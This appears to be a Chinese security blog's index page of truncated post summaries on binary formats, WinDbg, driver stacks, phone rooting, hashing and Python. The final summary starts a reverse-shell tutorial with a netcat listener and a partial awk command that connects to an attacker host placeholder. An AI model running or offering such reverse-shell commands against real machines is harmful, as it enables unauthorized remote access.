Anzi

摘要： 一、概念 DLL（Dynamic-link library）是Windows操作系统上实现的共享库，又称动态链接库。DLL 的文件格式与 EXE 文件的文件格式相同，即还是32位和64位Windows的可移植可执行文件(PE文件)。 SO 是Linux操作系统上实现的共享库，又称动态链接库。SO 的 阅读全文

摘要： PLT表和GOT表应用于Unix/Linux上的ELF文件，至于Windows系统PE文件使用的是IAT表。 PLT 过程链接表，用于调用链接时地址未知的外部函数，并在首次调用时访问并进行地址解析（获取真正的地址）。 GOT 全局偏移表，用于储存真正的地址。这是链接器在执行链接时需要填充的部分，保存 阅读全文

摘要： 一、概念 一个真实物理设备与设备对象可以是一对多的关系，驱动程序或驱动对象与设备对象也可以是一对多的关系。 设备栈 第一种理解：每一个设备对象都可以绑定一个真实硬件设备（也可以不绑定），当一个硬件设备被多个设备对象所绑定时，这组设备对象被称为设备栈（一般最初是至少有一个设备对象的）。 第二种理解：I 阅读全文

摘要： 用户模式下调试 常用命令 1.导入符号文件相关 命令>>>导入符号文件：.sympath pdb符号文件路径程序重新加载：.reload查看模块中的符号信息：x 模块名+'!'+'*'查看模块中某些包含"xxx"的方法：x 模块名+'!'+"xxx"+'*' PS: '*'是通配符设置断点：bu 模 阅读全文

摘要： 符号文件包含大量二进制文件在运行时不需要的数据。 符号可以包括变量名称、类型（如果适用）、存储地址或寄存器以及任何父符号或子符号。 符号示例包括变量名（本地和全局）、函数以及模块的任何入口点。 调试器从位于本地文件系统的或从远程符号服务器加载的符号文件中获取其有关符号的信息。 （PS：使用符号服务器 阅读全文

摘要： 因为手机设备锁解除需要卡时间懒得重新来一遍，当时root过程中也没有记录图片，所以没有图片，只有过程。 第一步：BL解锁 在小米官网中下载最新的小米解锁工具，并按教程进行解锁即可（https://www.miui.com/unlock/index.html）。 1.点击 手机设置 -> 我的设备 - 阅读全文

摘要： HASH，就是把任意长度的输入通过算法生成特定的固定长度的输出，并将该输出称为HASH值。 常用的HASH算法有：MD4、MD5、SHA1、以及SHA256。 一、MD4 初始化，带有常数（识别特征） void MD4::InitState(HashWordType *state) { state[ 阅读全文

摘要： 一 、自定义包和导入自定义包 以包名建立一个 包名相同的文件，里面至少包含__init__.py文件。__init__.py可以是空文件，也可以有Python代码。因为__init__.py本身就是一个模块，而它的模块名就是对应包的名字，调用包就是执行包下的__init__.py文件。 之后，我们可 阅读全文

摘要： 一、Tenet介绍 项目地址：https://github.com/gaasedelen/tenet 作者博客地址：http://blog.ret2.io/2021/04/20/tenet-trace-explorer/ 看雪大佬的翻译：https://bbs.pediy.com/thread-26 阅读全文

摘要： 反弹shell 一、基于AWK hacker机器上执行命令： nc -l Port hacker机器一直监听某端口。 在受害主机上执行命令： awk 'BEGIN {s = "/inet/tcp/0/hackerHostIp/Port"; while(42) { do{ printf "shell> 阅读全文